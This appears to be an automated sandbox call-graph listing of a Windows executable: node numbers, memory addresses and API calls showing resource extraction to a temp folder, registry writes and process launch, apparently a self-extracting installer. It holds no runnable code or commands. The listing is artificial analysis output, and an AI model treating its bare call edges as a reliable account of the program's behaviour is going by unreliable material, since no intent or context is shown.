7ff7e74f11ec FreeSid 2660->2663 2661->2659 2664 7ff7e74f1238 2662->2664 2663->2661 2664->2589 2664->2595 2667 7ff7e74f51f8 7 API calls 2666->2667 2668 7ff7e74f62af LocalAlloc 2667->2668 2669 7ff7e74f62cd 2668->2669 2670 7ff7e74f62fb 2668->2670 2671 7ff7e74f4f2c 24 API calls 2669->2671 2672 7ff7e74f51f8 7 API calls 2670->2672 2673 7ff7e74f62eb 2671->2673 2674 7ff7e74f630d 2672->2674 2888 7ff7e74f7958 GetLastError 2673->2888 2675 7ff7e74f6311 2674->2675 2676 7ff7e74f634a lstrcmpA 2674->2676 2678 7ff7e74f4f2c 24 API calls 2675->2678 2679 7ff7e74f6364 LocalFree 2676->2679 2680 7ff7e74f637a 2676->2680 2681 7ff7e74f632f LocalFree 2678->2681 2682 7ff7e74f324b 2679->2682 2683 7ff7e74f4f2c 24 API calls 2680->2683 2681->2682 2682->2450 2682->2452 2682->2457 2684 7ff7e74f639c LocalFree 2683->2684 2685 7ff7e74f62f0 2684->2685 2685->2682 2687 7ff7e74f51f8 7 API calls 2686->2687 2688 7ff7e74f61f1 2687->2688 2689 7ff7e74f61f6 2688->2689 2690 7ff7e74f623a 2688->2690 2691 7ff7e74f4f2c 24 API calls 2689->2691 2692 7ff7e74f51f8 7 API calls 2690->2692 2693 7ff7e74f6215 2691->2693 2694 7ff7e74f6253 2692->2694 2695 7ff7e74f326e 2693->2695 2696 7ff7e74f7984 13 API calls 2694->2696 2695->2457 2700 7ff7e74f68f0 2695->2700 2697 7ff7e74f625f 2696->2697 2697->2695 2698 7ff7e74f6263 2697->2698 2699 7ff7e74f4f2c 24 API calls 2698->2699 2699->2693 2701 7ff7e74f51f8 7 API calls 2700->2701 2702 7ff7e74f6932 LocalAlloc 2701->2702 2703 7ff7e74f6982 2702->2703 2704 7ff7e74f6952 2702->2704 2705 7ff7e74f51f8 7 API calls 2703->2705 2706 7ff7e74f4f2c 24 API calls 2704->2706 2707 7ff7e74f6994 2705->2707 2708 7ff7e74f6970 2706->2708 2709 7ff7e74f69d1 lstrcmpA LocalFree 2707->2709 2710 7ff7e74f6998 2707->2710 2913 7ff7e74f7958 GetLastError 2708->2913 2713 7ff7e74f6a63 2709->2713 2714 7ff7e74f6a18 2709->2714 2712 7ff7e74f4f2c 24 API calls 2710->2712 2716 7ff7e74f69b6 LocalFree 2712->2716 2715 7ff7e74f6d40 2713->2715 2718 7ff7e74f6a7b GetTempPathA 2713->2718 2721 7ff7e74f6710 53 API calls 2714->2721 2717 
7ff7e74f7d28 28 API calls 2715->2717 2727 7ff7e74f697b 2716->2727 2717->2727 2720 7ff7e74f6a9e 2718->2720 2729 7ff7e74f6ad1 2718->2729 2719 7ff7e74f86f0 7 API calls 2722 7ff7e74f327b 2719->2722 2889 7ff7e74f6710 2720->2889 2724 7ff7e74f6a38 2721->2724 2722->2457 2722->2462 2726 7ff7e74f6a40 2724->2726 2724->2727 2728 7ff7e74f4f2c 24 API calls 2726->2728 2727->2719 2730 7ff7e74f6975 2728->2730 2729->2727 2731 7ff7e74f6b25 GetDriveTypeA 2729->2731 2732 7ff7e74f6d07 GetWindowsDirectoryA 2729->2732 2730->2727 2734 7ff7e74f6b42 GetFileAttributesA 2731->2734 2747 7ff7e74f6b3d 2731->2747 2736 7ff7e74f6f14 38 API calls 2732->2736 2734->2747 2736->2729 2737 7ff7e74f6710 53 API calls 2737->2729 2738 7ff7e74f6b81 GetDiskFreeSpaceA 2740 7ff7e74f6baf MulDiv 2738->2740 2738->2747 2739 7ff7e74f2490 25 API calls 2739->2747 2740->2747 2741 7ff7e74f6c2e GetWindowsDirectoryA 2741->2747 2742 7ff7e74f6f14 38 API calls 2742->2747 2743 7ff7e74f7e08 CharPrevA 2744 7ff7e74f6c56 GetFileAttributesA 2743->2744 2745 7ff7e74f6c6c CreateDirectoryA 2744->2745 2744->2747 2745->2747 2746 7ff7e74f6c99 SetFileAttributesA 2746->2747 2747->2727 2747->2731 2747->2732 2747->2734 2747->2738 2747->2739 2747->2741 2747->2742 2747->2743 2747->2746 2748 7ff7e74f6710 53 API calls 2747->2748 2748->2747 2750 7ff7e74f6f63 GetCurrentDirectoryA SetCurrentDirectoryA 2749->2750 2776 7ff7e74f6f5b 2749->2776 2751 7ff7e74f6f8e 2750->2751 2752 7ff7e74f6fbb GetDiskFreeSpaceA 2750->2752 2756 7ff7e74f4f2c 24 API calls 2751->2756 2753 7ff7e74f6ffc MulDiv 2752->2753 2754 7ff7e74f71da memset 2752->2754 2753->2754 2757 7ff7e74f702a GetVolumeInformationA 2753->2757 2964 7ff7e74f7958 GetLastError 2754->2964 2755 7ff7e74f86f0 7 API calls 2758 7ff7e74f33a1 2755->2758 2759 7ff7e74f6fab 2756->2759 2762 7ff7e74f70c1 SetCurrentDirectoryA 2757->2762 2763 7ff7e74f7062 memset 2757->2763 2758->2457 2758->2469 2945 7ff7e74f7958 GetLastError 2759->2945 2761 7ff7e74f71f2 GetLastError FormatMessageA 2765 7ff7e74f7234 2761->2765 2771 
7ff7e74f70e9 2762->2771 2946 7ff7e74f7958 GetLastError 2763->2946 2768 7ff7e74f4f2c 24 API calls 2765->2768 2767 7ff7e74f6fb0 2767->2776 2770 7ff7e74f724f SetCurrentDirectoryA 2768->2770 2769 7ff7e74f707a GetLastError FormatMessageA 2769->2765 2770->2776 2772 7ff7e74f712c 2771->2772 2773 7ff7e74f7150 2771->2773 2774 7ff7e74f4f2c 24 API calls 2772->2774 2773->2776 2947 7ff7e74f2520 2773->2947 2774->2767 2776->2755 2778 7ff7e74f51f8 7 API calls 2777->2778 2779 7ff7e74f5f9b FindResourceA LoadResource LockResource 2778->2779 2780 7ff7e74f61bf 2779->2780 2781 7ff7e74f5fec 2779->2781 2780->2489 2782 7ff7e74f6046 2781->2782 2783 7ff7e74f5ff8 GetDlgItem ShowWindow GetDlgItem ShowWindow 2781->2783 2965 7ff7e74f5e44 #20 2782->2965 2783->2782 2786 7ff7e74f604f 2791 7ff7e74f4f2c 24 API calls 2786->2791 2787 7ff7e74f6059 #20 2787->2786 2788 7ff7e74f60c1 #22 2787->2788 2789 7ff7e74f6145 2788->2789 2790 7ff7e74f6105 #23 2788->2790 2793 7ff7e74f6165 2789->2793 2794 7ff7e74f6151 FreeResource 2789->2794 2790->2786 2790->2789 2792 7ff7e74f6143 2791->2792 2792->2789 2795 7ff7e74f618f 2793->2795 2796 7ff7e74f6171 2793->2796 2794->2793 2795->2780 2798 7ff7e74f61a1 SendMessageA 2795->2798 2797 7ff7e74f4f2c 24 API calls 2796->2797 2797->2795 2798->2780 2800 7ff7e74f4208 2799->2800 2803 7ff7e74f421f 2799->2803 2802 7ff7e74f51f8 7 API calls 2800->2802 2801 7ff7e74f4235 memset 2801->2803 2802->2803 2803->2801 2804 7ff7e74f434a 2803->2804 2807 7ff7e74f45e9 2803->2807 2810 7ff7e74f46d3 2803->2810 2811 7ff7e74f43eb CompareStringA 2803->2811 2813 7ff7e74f4694 2803->2813 2816 7ff7e74f51f8 7 API calls 2803->2816 2821 7ff7e74f45da LocalFree 2803->2821 2822 7ff7e74f45a8 LocalFree 2803->2822 2826 7ff7e74f42ed CompareStringA 2803->2826 2842 7ff7e74f448a 2803->2842 2977 7ff7e74f15f4 2803->2977 3016 7ff7e74f1d10 memset memset RegCreateKeyExA 2803->3016 3043 7ff7e74f4838 2803->3043 2805 7ff7e74f4f2c 24 API calls 2804->2805 2841 7ff7e74f4369 2805->2841 2808 7ff7e74f86f0 7 API calls 2807->2808 2809 
7ff7e74f45fa 2808->2809 2809->2483 2810->2807 2812 7ff7e74f46ed RegOpenKeyExA 2810->2812 2811->2803 2811->2810 2812->2807 2815 7ff7e74f4722 RegQueryValueExA 2812->2815 2817 7ff7e74f4f2c 24 API calls 2813->2817 2819 7ff7e74f4817 RegCloseKey 2815->2819 2820 7ff7e74f4767 memset GetSystemDirectoryA 2815->2820 2816->2803 2823 7ff7e74f46b3 LocalFree 2817->2823 2819->2807 2824 7ff7e74f47ae 2820->2824 2825 7ff7e74f4798 2820->2825 2821->2807 2822->2803 2822->2810 2823->2807 2829 7ff7e74f10bc _vsnprintf 2824->2829 2828 7ff7e74f7e08 CharPrevA 2825->2828 2826->2803 2828->2824 2830 7ff7e74f47d7 RegSetValueExA 2829->2830 2830->2819 2831 7ff7e74f466f 2833 7ff7e74f4f2c 24 API calls 2831->2833 2832 7ff7e74f449b GetProcAddress 2834 7ff7e74f461c 2832->2834 2832->2842 2837 7ff7e74f4692 2833->2837 2835 7ff7e74f4f2c 24 API calls 2834->2835 2838 7ff7e74f463f FreeLibrary 2835->2838 2839 7ff7e74f464e LocalFree 2837->2839 2838->2839 3069 7ff7e74f7958 GetLastError 2839->3069 2841->2807 2842->2831 2842->2832 2843 7ff7e74f4580 FreeLibrary 2842->2843 2844 7ff7e74f45ce FreeLibrary 2842->2844 3059 7ff7e74f7c50 2842->3059 2843->2822 2844->2821 2846 7ff7e74f51f8 7 API calls 2845->2846 2847 7ff7e74f407b LocalAlloc 2846->2847 2848 7ff7e74f40cd 2847->2848 2849 7ff7e74f409d 2847->2849 2851 7ff7e74f51f8 7 API calls 2848->2851 2850 7ff7e74f4f2c 24 API calls 2849->2850 2852 7ff7e74f40bb 2850->2852 2853 7ff7e74f40df 2851->2853 3107 7ff7e74f7958 GetLastError 2852->3107 2855 7ff7e74f40e3 2853->2855 2856 7ff7e74f4120 lstrcmpA 2853->2856 2857 7ff7e74f4f2c 24 API calls 2855->2857 2858 7ff7e74f413e 2856->2858 2859 7ff7e74f4188 LocalFree 2856->2859 2861 7ff7e74f4101 LocalFree 2857->2861 2862 7ff7e74f7d28 28 API calls 2858->2862 2860 7ff7e74f3261 2859->2860 2860->2450 2860->2457 2861->2860 2863 7ff7e74f415e LocalFree 2862->2863 2863->2860 2864->2485 2866 7ff7e74f79e2 2865->2866 2867 7ff7e74f10bc _vsnprintf 2866->2867 2873 7ff7e74f7a65 FreeResource 2866->2873 2874 7ff7e74f7a1a FreeResource 2866->2874 2868 
7ff7e74f7a41 FindResourceA 2867->2868 2869 7ff7e74f79b6 LoadResource LockResource 2868->2869 2870 7ff7e74f7a63 2868->2870 2869->2866 2869->2870 2871 7ff7e74f86f0 7 API calls 2870->2871 2872 7ff7e74f7a90 2871->2872 2872->2473 2873->2870 2874->2866 2876 7ff7e74f51f8 7 API calls 2875->2876 2877 7ff7e74f4a6f LocalAlloc 2876->2877 2878 7ff7e74f4ab1 2877->2878 2879 7ff7e74f4a91 2877->2879 2881 7ff7e74f51f8 7 API calls 2878->2881 2880 7ff7e74f4f2c 24 API calls 2879->2880 2882 7ff7e74f4aaf 2880->2882 2883 7ff7e74f4ac3 2881->2883 2882->2457 2884 7ff7e74f4add lstrcmpA 2883->2884 2885 7ff7e74f4ac7 2883->2885 2884->2885 2886 7ff7e74f4b16 LocalFree 2884->2886 2887 7ff7e74f4f2c 24 API calls 2885->2887 2886->2882 2887->2886 2888->2685 2890 7ff7e74f6742 2889->2890 2892 7ff7e74f6809 2889->2892 2920 7ff7e74f65a8 2890->2920 2931 7ff7e74f6d9c 2892->2931 2893 7ff7e74f6886 2895 7ff7e74f86f0 7 API calls 2893->2895 2898 7ff7e74f68d2 2895->2898 2898->2727 2914 7ff7e74f2490 GetWindowsDirectoryA 2898->2914 2899 7ff7e74f6875 2905 7ff7e74f6f14 38 API calls 2899->2905 2900 7ff7e74f6856 CreateDirectoryA 2903 7ff7e74f6894 2900->2903 2904 7ff7e74f686b 2900->2904 2901 7ff7e74f67a3 GetSystemInfo 2911 7ff7e74f67bd 2901->2911 2902 7ff7e74f67f8 2906 7ff7e74f7e08 CharPrevA 2902->2906 2943 7ff7e74f7958 GetLastError 2903->2943 2904->2899 2907 7ff7e74f6882 2905->2907 2906->2892 2907->2893 2912 7ff7e74f68aa RemoveDirectoryA 2907->2912 2909 7ff7e74f7e08 CharPrevA 2909->2902 2910 7ff7e74f6899 2910->2893 2911->2902 2911->2909 2912->2893 2913->2730 2915 7ff7e74f24ce 2914->2915 2916 7ff7e74f24ec 2914->2916 2917 7ff7e74f4f2c 24 API calls 2915->2917 2918 7ff7e74f86f0 7 API calls 2916->2918 2917->2916 2919 7ff7e74f2507 2918->2919 2919->2729 2919->2737 2922 7ff7e74f65df 2920->2922 2921 7ff7e74f10bc _vsnprintf 2921->2922 2922->2921 2923 7ff7e74f7e08 CharPrevA 2922->2923 2926 7ff7e74f666f GetTempFileNameA 2922->2926 2924 7ff7e74f6640 RemoveDirectoryA GetFileAttributesA 2923->2924 2924->2922 2925 7ff7e74f66df 
CreateDirectoryA 2924->2925 2925->2926 2927 7ff7e74f66b4 2925->2927 2926->2927 2928 7ff7e74f668f DeleteFileA CreateDirectoryA 2926->2928 2929 7ff7e74f86f0 7 API calls 2927->2929 2928->2927 2930 7ff7e74f66c6 2929->2930 2930->2893 2930->2901 2930->2902 2932 7ff7e74f6db7 2931->2932 2932->2932 2933 7ff7e74f6dc0 LocalAlloc 2932->2933 2934 7ff7e74f6de0 2933->2934 2939 7ff7e74f6e21 2933->2939 2935 7ff7e74f4f2c 24 API calls 2934->2935 2936 7ff7e74f6dfe 2935->2936 2941 7ff7e74f6852 2936->2941 2944 7ff7e74f7958 GetLastError 2936->2944 2937 7ff7e74f7e08 CharPrevA 2940 7ff7e74f6e7f CreateFileA LocalFree 2937->2940 2939->2937 2940->2936 2942 7ff7e74f6ecb CloseHandle GetFileAttributesA 2940->2942 2941->2899 2941->2900 2942->2936 2943->2910 2944->2941 2945->2767 2946->2769 2948 7ff7e74f254d 2947->2948 2949 7ff7e74f258a 2947->2949 2950 7ff7e74f10bc _vsnprintf 2948->2950 2951 7ff7e74f25d3 2949->2951 2952 7ff7e74f258f 2949->2952 2953 7ff7e74f2565 2950->2953 2955 7ff7e74f2585 2951->2955 2959 7ff7e74f10bc _vsnprintf 2951->2959 2954 7ff7e74f10bc _vsnprintf 2952->2954 2956 7ff7e74f4f2c 24 API calls 2953->2956 2958 7ff7e74f25a7 2954->2958 2957 7ff7e74f86f0 7 API calls 2955->2957 2956->2955 2960 7ff7e74f2631 2957->2960 2961 7ff7e74f4f2c 24 API calls 2958->2961 2962 7ff7e74f25ef 2959->2962 2960->2776 2961->2955 2963 7ff7e74f4f2c 24 API calls 2962->2963 2963->2955 2964->2761 2966 7ff7e74f5ed1 2965->2966 2967 7ff7e74f5f46 2965->2967 2968 7ff7e74f55c0 29 API calls 2966->2968 2969 7ff7e74f86f0 7 API calls 2967->2969 2970 7ff7e74f5ee8 2968->2970 2971 7ff7e74f5f5c 2969->2971 2970->2967 2972 7ff7e74f5ef1 #21 2970->2972 2971->2786 2971->2787 2972->2967 2973 7ff7e74f5f0c 2972->2973 2973->2967 2974 7ff7e74f59b0 CloseHandle 2973->2974 2975 7ff7e74f5f2e 2974->2975 2975->2967 2976 7ff7e74f5f33 #23 2975->2976 2976->2967 2978 7ff7e74f1649 2977->2978 3070 7ff7e74f1558 2978->3070 2981 7ff7e74f7e08 CharPrevA 2983 7ff7e74f16dc 2981->2983 2982 7ff7e74f7fb8 2 API calls 2984 7ff7e74f177f 2982->2984 2983->2982 
2985 7ff7e74f19d3 2984->2985 2986 7ff7e74f1788 CompareStringA 2984->2986 2987 7ff7e74f7fb8 2 API calls 2985->2987 2986->2985 2988 7ff7e74f17bb GetFileAttributesA 2986->2988 2991 7ff7e74f19e0 2987->2991 2989 7ff7e74f17d5 2988->2989 2990 7ff7e74f19ab 2988->2990 2989->2990 2994 7ff7e74f1558 2 API calls 2989->2994 2995 7ff7e74f4f2c 24 API calls 2990->2995 2992 7ff7e74f1a83 LocalAlloc 2991->2992 2993 7ff7e74f19e9 CompareStringA 2991->2993 2992->2990 2996 7ff7e74f1aa3 GetFileAttributesA 2992->2996 2993->2992 3000 7ff7e74f1a18 2993->3000 2997 7ff7e74f17f9 2994->2997 3014 7ff7e74f18c5 2995->3014 2998 7ff7e74f1ab9 2996->2998 2999 7ff7e74f1823 LocalAlloc 2997->2999 3001 7ff7e74f1558 2 API calls 2997->3001 3015 7ff7e74f1b0c 2998->3015 2999->2990 3002 7ff7e74f1847 GetPrivateProfileIntA GetPrivateProfileStringA 2999->3002 3000->3000 3005 7ff7e74f1a39 LocalAlloc 3000->3005 3001->2999 3006 7ff7e74f1940 3002->3006 3002->3014 3003 7ff7e74f86f0 7 API calls 3004 7ff7e74f1b9e 3003->3004 3004->2803 3005->2990 3009 7ff7e74f1a6a 3005->3009 3007 7ff7e74f1973 3006->3007 3008 7ff7e74f1951 GetShortPathNameA 3006->3008 3013 7ff7e74f10bc _vsnprintf 3007->3013 3008->3007 3011 7ff7e74f10bc _vsnprintf 3009->3011 3011->3014 3012 7ff7e74f1b82 3012->3003 3013->3014 3014->3012 3078 7ff7e74f2ae8 3015->3078 3017 7ff7e74f1db6 3016->3017 3018 7ff7e74f1fff 3016->3018 3021 7ff7e74f10bc _vsnprintf 3017->3021 3024 7ff7e74f1e0d 3017->3024 3019 7ff7e74f86f0 7 API calls 3018->3019 3020 7ff7e74f200e 3019->3020 3020->2803 3022 7ff7e74f1dd6 RegQueryValueExA 3021->3022 3022->3017 3023 7ff7e74f1e2c GetSystemDirectoryA 3022->3023 3025 7ff7e74f7e08 CharPrevA 3023->3025 3024->3023 3026 7ff7e74f1e0f RegCloseKey 3024->3026 3027 7ff7e74f1e50 LoadLibraryA 3025->3027 3026->3018 3028 7ff7e74f1f3b GetModuleFileNameA 3027->3028 3029 7ff7e74f1e6c GetProcAddress FreeLibrary 3027->3029 3031 7ff7e74f1f5e RegCloseKey 3028->3031 3034 7ff7e74f1ece 3028->3034 3029->3028 3030 7ff7e74f1ea4 GetSystemDirectoryA 3029->3030 3032 
7ff7e74f1ebb 3030->3032 3030->3034 3031->3018 3033 7ff7e74f7e08 CharPrevA 3032->3033 3033->3034 3034->3034 3035 7ff7e74f1ef7 LocalAlloc 3034->3035 3036 7ff7e74f1f74 3035->3036 3037 7ff7e74f1f1b 3035->3037 3039 7ff7e74f10bc _vsnprintf 3036->3039 3038 7ff7e74f4f2c 24 API calls 3037->3038 3041 7ff7e74f1f39 3038->3041 3040 7ff7e74f1faa 3039->3040 3040->3040 3042 7ff7e74f1fb3 RegSetValueExA RegCloseKey LocalFree 3040->3042 3041->3031 3042->3018 3044 7ff7e74f4874 CreateProcessA 3043->3044 3045 7ff7e74f486d 3043->3045 3046 7ff7e74f49bb 3044->3046 3047 7ff7e74f48ca WaitForSingleObject GetExitCodeProcess 3044->3047 3049 7ff7e74f86f0 7 API calls 3045->3049 3106 7ff7e74f7958 GetLastError 3046->3106 3054 7ff7e74f4901 3047->3054 3051 7ff7e74f4a37 3049->3051 3050 7ff7e74f49c0 GetLastError FormatMessageA 3052 7ff7e74f4f2c 24 API calls 3050->3052 3051->2803 3052->3045 3055 7ff7e74f23c0 19 API calls 3054->3055 3058 7ff7e74f4932 CloseHandle CloseHandle 3054->3058 3057 7ff7e74f4955 3055->3057 3056 7ff7e74f49b2 3056->3045 3057->3058 3058->3045 3058->3056 3060 7ff7e74f7c85 3059->3060 3061 7ff7e74f7e08 CharPrevA 3060->3061 3062 7ff7e74f7cc3 GetFileAttributesA 3061->3062 3063 7ff7e74f7cf6 LoadLibraryA 3062->3063 3064 7ff7e74f7cd9 3062->3064 3066 7ff7e74f7d09 3063->3066 3064->3063 3065 7ff7e74f7cdd LoadLibraryExA 3064->3065 3065->3066 3067 7ff7e74f86f0 7 API calls 3066->3067 3068 7ff7e74f7d19 3067->3068 3068->2842 3069->2841 3071 7ff7e74f1579 3070->3071 3073 7ff7e74f1591 3071->3073 3075 7ff7e74f15c1 3071->3075 3092 7ff7e74f7f48 3071->3092 3074 7ff7e74f7f48 2 API calls 3073->3074 3076 7ff7e74f159f 3074->3076 3075->2981 3075->2983 3076->3075 3077 7ff7e74f7f48 2 API calls 3076->3077 3077->3076 3079 7ff7e74f2d41 3078->3079 3080 7ff7e74f2b1f 3078->3080 3082 7ff7e74f86f0 7 API calls 3079->3082 3080->3079 3081 7ff7e74f2b28 GetModuleFileNameA 3080->3081 3081->3079 3091 7ff7e74f2b50 3081->3091 3083 7ff7e74f2d54 3082->3083 3083->3012 3084 7ff7e74f2b54 IsDBCSLeadByte 3084->3091 3085 7ff7e74f2d13 
CharNextA 3088 7ff7e74f2d25 CharNextA 3085->3088 3086 7ff7e74f2b79 CharNextA CharUpperA 3087 7ff7e74f2c6d CharUpperA 3086->3087 3086->3091 3087->3091 3088->3079 3088->3084 3090 7ff7e74f2bbe CharPrevA 3090->3091 3091->3084 3091->3085 3091->3086 3091->3088 3091->3090 3097 7ff7e74f7ea0 3091->3097 3093 7ff7e74f7f60 3092->3093 3094 7ff7e74f7f99 3093->3094 3095 7ff7e74f7f82 CharNextA 3093->3095 3096 7ff7e74f7f6a IsDBCSLeadByte 3093->3096 3094->3071 3095->3093 3096->3093 3096->3094 3098 7ff7e74f7eb8 3097->3098 3098->3098 3099 7ff7e74f7ec1 CharPrevA 3098->3099 3100 7ff7e74f7edd CharPrevA 3099->3100 3101 7ff7e74f7ed5 3100->3101 3102 7ff7e74f7ef4 3100->3102 3101->3100 3103 7ff7e74f7efe CharPrevA 3101->3103 3102->3103 3104 7ff7e74f7f27 3102->3104 3105 7ff7e74f7f15 CharNextA 3102->3105 3103->3104 3103->3105 3104->3091 3105->3104 3106->3050 3107->2860 3109 7ff7e74f23ad 3108->3109 3110 7ff7e74f2349 RegQueryInfoKeyA RegCloseKey 3108->3110 3109->2514 3110->3109 3112 7ff7e74f2271 3111->3112 3113 7ff7e74f22db 3111->3113 3114 7ff7e74f7e08 CharPrevA 3112->3114 3115 7ff7e74f86f0 7 API calls 3113->3115 3116 7ff7e74f2284 WritePrivateProfileStringA _lopen 3114->3116 3117 7ff7e74f22ed 3115->3117 3116->3113 3118 7ff7e74f22b7 _llseek _lclose 3116->3118 3117->2514 3118->3113 3201 7ff7e74f5820 3202 7ff7e74f5881 ReadFile 3201->3202 3203 7ff7e74f584d 3201->3203 3202->3203 3204 7ff7e74f845e 3205 7ff7e74f8478 GetStartupInfoW 3204->3205 3206 7ff7e74f84ab 3205->3206 3207 7ff7e74f84bd 3206->3207 3208 7ff7e74f84da Sleep 3206->3208 3209 7ff7e74f84cd _amsg_exit 3207->3209 3211 7ff7e74f84e7 3207->3211 3208->3206 3209->3211 3210 7ff7e74f8569 _initterm 3213 7ff7e74f8586 _IsNonwritableInCurrentImage 3210->3213 3211->3210 3212 7ff7e74f854a 3211->3212 3211->3213 3214 7ff7e74f866f _ismbblead 3213->3214 3215 7ff7e74f85f4 3213->3215 3214->3213 3216 7ff7e74f2d70 292 API calls 3215->3216 3217 7ff7e74f862f 3216->3217 3218 7ff7e74f8646 3217->3218 3219 7ff7e74f863e exit 3217->3219 3218->3212 3220 7ff7e74f864f _cexit 
3218->3220 3219->3218 3220->3212 3221 7ff7e74f831e 3224 7ff7e74f8332 3221->3224 3223 7ff7e74f8399 __set_app_type 3225 7ff7e74f83d6 3223->3225 3228 7ff7e74f8aa8 GetModuleHandleW 3224->3228 3226 7ff7e74f83df __setusermatherr 3225->3226 3227 7ff7e74f83ec 3225->3227 3226->3227 3229 7ff7e74f8abd 3228->3229 3229->3223 3230 7ff7e74f8a1e SetUnhandledExceptionFilter 3231 7ff7e74f351e 3232 7ff7e74f3532 3231->3232 3233 7ff7e74f361c 3231->3233 3237 7ff7e74f3571 GetDesktopWindow 3232->3237 3240 7ff7e74f353f 3232->3240 3234 7ff7e74f3625 SendDlgItemMessageA 3233->3234 3235 7ff7e74f3615 3233->3235 3234->3235 3236 7ff7e74f3560 EndDialog 3236->3235 3238 7ff7e74f4dc8 14 API calls 3237->3238 3239 7ff7e74f3588 6 API calls 3238->3239 3239->3235 3240->3235 3240->3236 3241 7ff7e74f5a1e 3243 7ff7e74f5a28 3241->3243 3242 7ff7e74f5a7d SetFilePointer 3244 7ff7e74f5a3c 3242->3244 3243->3242 3243->3244 3245 7ff7e74f7b0f 3246 7ff7e74f7b5d 3245->3246 3247 7ff7e74f7e08 CharPrevA 3246->3247 3248 7ff7e74f7b95 CreateFileA 3247->3248 3249 7ff7e74f7bd0 3248->3249 3250 7ff7e74f7bde WriteFile 3248->3250 3253 7ff7e74f86f0 7 API calls 3249->3253 3251 7ff7e74f7c02 CloseHandle 3250->3251 3251->3249 3254 7ff7e74f7c35 3253->3254 3119 7ff7e74f58d0 3126 7ff7e74f3c80 3119->3126 3122 7ff7e74f5902 WriteFile 3123 7ff7e74f58fa 3122->3123 3124 7ff7e74f5939 3122->3124 3124->3123 3125 7ff7e74f5965 SendDlgItemMessageA 3124->3125 3125->3123 3127 7ff7e74f3c8c MsgWaitForMultipleObjects 3126->3127 3128 7ff7e74f3d25 3127->3128 3129 7ff7e74f3cb4 PeekMessageA 3127->3129 3128->3122 3128->3123 3129->3127 3130 7ff7e74f3cd9 3129->3130 3130->3127 3130->3128 3131 7ff7e74f3ce7 DispatchMessageA 3130->3131 3132 7ff7e74f3cf8 PeekMessageA 3130->3132 3131->3132 3132->3130 3255 7ff7e74f868e 3256 7ff7e74f86a6 3255->3256 3257 7ff7e74f869d _exit 3255->3257 3258 7ff7e74f86af _cexit 3256->3258 3259 7ff7e74f86bb 3256->3259 3257->3256 3258->3259 3260 7ff7e74f89ce 3261 7ff7e74f8a02 3260->3261 3262 7ff7e74f89df 3260->3262 3262->3261 3263 
7ff7e74f89fb ?terminate@ 3262->3263 3263->3261 3264 7ff7e74f3a4e 3265 7ff7e74f3a73 3264->3265 3266 7ff7e74f3b49 3264->3266 3265->3266 3267 7ff7e74f3b51 GetDesktopWindow 3265->3267 3268 7ff7e74f3a88 3265->3268 3269 7ff7e74f3a94 3266->3269 3270 7ff7e74f3c5a EndDialog 3266->3270 3273 7ff7e74f4dc8 14 API calls 3267->3273 3271 7ff7e74f3abb 3268->3271 3272 7ff7e74f3a8c 3268->3272 3270->3269 3271->3269 3276 7ff7e74f3ac5 ResetEvent 3271->3276 3272->3269 3275 7ff7e74f3a9b TerminateThread 3272->3275 3274 7ff7e74f3b6f 3273->3274 3277 7ff7e74f3bdb SetWindowTextA CreateThread 3274->3277 3278 7ff7e74f3b78 GetDlgItem SendMessageA GetDlgItem SendMessageA 3274->3278 3275->3270 3279 7ff7e74f4f2c 24 API calls 3276->3279 3277->3269 3280 7ff7e74f3c28 3277->3280 3278->3277 3283 7ff7e74f3b03 3279->3283 3281 7ff7e74f4f2c 24 API calls 3280->3281 3281->3266 3282 7ff7e74f3b24 SetEvent 3285 7ff7e74f3c80 4 API calls 3282->3285 3283->3282 3284 7ff7e74f3b0c SetEvent 3283->3284 3284->3269 3285->3266 3286 7ff7e74f34ce 3287 7ff7e74f34eb CallWindowProcA 3286->3287 3288 7ff7e74f34dc 3286->3288 3289 7ff7e74f34e7 3287->3289 3288->3287 3288->3289 3290 7ff7e74f874b RtlCaptureContext RtlLookupFunctionEntry 3291 7ff7e74f8795 RtlVirtualUnwind 3290->3291 3292 7ff7e74f87d7 3290->3292 3291->3292 3295 7ff7e74f8714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3292->3295 3296 7ff7e74f5aca 3297 7ff7e74f5ad0 GlobalFree 3296->3297 3298 7ff7e74f5a9e 3296->3298 3299 7ff7e74f8400 __getmainargs 3300 7ff7e74f397e 3301 7ff7e74f3992 3300->3301 3302 7ff7e74f399a 3300->3302 3301->3302 3304 7ff7e74f39ce GetDesktopWindow 3301->3304 3303 7ff7e74f3a2c EndDialog 3302->3303 3305 7ff7e74f399f 3302->3305 3303->3305 3306 7ff7e74f4dc8 14 API calls 3304->3306 3307 7ff7e74f39e5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3306->3307 3307->3305 3308 7ff7e74f5f7e 3309 7ff7e74f5f9b FindResourceA LoadResource LockResource 3308->3309 3310 7ff7e74f51f8 7 API calls 3308->3310 3311 7ff7e74f5fec 
3309->3311 3325 7ff7e74f61bf 3309->3325 3310->3309 3312 7ff7e74f6046 3311->3312 3313 7ff7e74f5ff8 GetDlgItem ShowWindow GetDlgItem ShowWindow 3311->3313 3314 7ff7e74f5e44 33 API calls 3312->3314 3313->3312 3315 7ff7e74f604b 3314->3315 3316 7ff7e74f604f 3315->3316 3317 7ff7e74f6059 #20 3315->3317 3321 7ff7e74f4f2c 24 API calls 3316->3321 3317->3316 3318 7ff7e74f60c1 #22 3317->3318 3319 7ff7e74f6143 3318->3319 3320 7ff7e74f6105 #23 3318->3320 3322 7ff7e74f6165 3319->3322 3323 7ff7e74f6151 FreeResource 3319->3323 3320->3316 3320->3319 3321->3319 3324 7ff7e74f618f 3322->3324 3326 7ff7e74f4f2c 24 API calls 3322->3326 3323->3322 3324->3325 3327 7ff7e74f61a1 SendMessageA 3324->3327 3326->3324 3327->3325 3328 7ff7e74f4b3b SendMessageA 3329 7ff7e74f55ba 3330 7ff7e74f55be 3329->3330 3331 7ff7e74f557c 3329->3331 3332 7ff7e74f5610 3330->3332 3333 7ff7e74f563d lstrcmpA 3330->3333 3334 7ff7e74f4f2c 24 API calls 3332->3334 3335 7ff7e74f5634 3333->3335 3336 7ff7e74f5694 3333->3336 3334->3335 3336->3335 3337 7ff7e74f56e8 CreateFileA 3336->3337 3337->3335 3339 7ff7e74f571e 3337->3339 3338 7ff7e74f57a1 CreateFileA 3338->3335 3339->3335 3339->3338 3340 7ff7e74f5789 CharNextA 3339->3340 3341 7ff7e74f5772 CreateDirectoryA 3339->3341 3340->3339 3341->3340

Callgraph

